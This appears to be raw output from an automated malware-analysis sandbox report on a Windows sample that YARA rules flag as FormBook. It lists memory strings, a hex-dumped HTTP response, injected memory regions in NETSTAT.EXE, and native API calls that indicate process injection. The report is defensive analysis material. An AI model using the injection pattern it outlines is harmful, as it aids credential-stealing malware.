          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Frame-Options: SAMEORIGINDate: Wed, 16 Sep 2020 07:14:45 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00420CC0 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0043DD3C GetKeyboardState,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00440CB8 NtdllDefWindowProc_A,GetCapture,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045BA98 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042A524 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00450C40 GetSubMenu,SaveDC,RestoreDC,7344B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417940 NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004179F0 NtReadFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417A70 NtClose,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00417B20 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004178FA NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041793A NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_004179EA NtReadFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AFAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9560 NtWriteFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AF9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87A70 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87B20 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D879F0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D87940 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D878FA NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D879EA NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8793A NtCreateFile,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00450C40
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00455F90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00401026
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041B10C
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00408A50
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041BB67
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041ADA4
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_0041BF77
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AE20A0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B820A8
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00ACB090
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B828EC
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B8E824
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B71002
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AD4120
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00ABF900
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B822AE
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AEEBB0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B7DBD2
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B703DA
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B82B28
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AC841F
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B7D466
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AE2581
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00ACD5E0
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B825DD
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AB0D20
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B82D07
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B81D55
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B82EF7
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00AD6E30
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B7D616
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 1_2_00B81FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D78A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8BB67
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8B10C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D72FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8BF77
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D8AD9D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D72D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02D72D87
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: String function: 00403FC0 appears 68 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: String function: 00ABB150 appears 45 times
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: String function: 004060D4 appears 62 times
          Source: mp0nMsMroT.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: mp0nMsMroT.exe, 00000000.00000002.184868899.0000000002140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000000.00000002.184880166.0000000002150000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs mp0nMsMroT.exe
          Source: mp0nMsMroT.exe, 00000001.00000002.232810465.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mp0nMsMroT.exe
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
